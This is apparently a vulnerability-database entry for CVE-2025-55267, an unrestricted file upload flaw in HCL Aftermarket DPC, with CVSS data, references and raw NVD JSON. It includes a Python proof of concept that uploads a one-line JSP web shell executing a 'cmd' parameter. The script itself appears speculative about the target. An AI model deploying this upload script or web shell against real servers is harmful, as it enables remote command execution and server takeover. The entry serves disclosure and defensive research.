CVE-2025-55267

Description

HCL Aftermarket DPC is affected by Unrestricted File Upload vulnerability, allows attacker to upload and execute malicious scripts, gaining full control over the server.

CVSS Details

CVSS Score

5.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:hcltech:aftermarket_cloud:1.0.0:*:*:*:*:*:*:* - VULNERABLE

具体受影响版本未在提供信息中列出

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# PoC for CVE-2025-55267: Unrestricted File Upload in HCL Aftermarket DPC
import requests

target_url = "http://target-vulnerable-server/upload_endpoint"
login_url = "http://target-vulnerable-server/login"

# 1. Authenticate (Low privilege user required per PR:L)
session = requests.Session()
credentials = {"username": "attacker", "password": "password"}
session.post(login_url, data=credentials)

# 2. Prepare malicious file
# Assuming the web server supports JSP (common for enterprise apps like HCL)
malicious_file = {'file': ('shell.jsp', '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>', 'application/octet-stream')}

# 3. Upload the file
response = session.post(target_url, files=malicious_file)

if response.status_code == 200 and "upload" in response.text.lower():
    print("[+] File uploaded successfully!")
    print("[+] Check the upload directory to access the shell.")
else:
    print("[-] Upload failed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-55267
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-55267
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-55267/
[4] VulDB https://vuldb.com/cve/CVE-2025-55267
[5] https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129793

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-55267", "sourceIdentifier": "[email protected]", "published": "2026-03-26T13:16:25.953", "lastModified": "2026-03-26T20:35:15.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL Aftermarket DPC is affected by Unrestricted File Upload vulnerability, allows attacker to upload and execute malicious scripts, gaining full control over the server."}, {"lang": "es", "value": "HCL Aftermarket DPC está afectado por la vulnerabilidad de carga de archivos sin restricciones, permite al atacante cargar y ejecutar scripts maliciosos, obteniendo control total sobre el servidor."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:aftermarket_cloud:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "C71E5E64-ED4C-4763-8A74-5F9DDCFD13DA"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129793", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}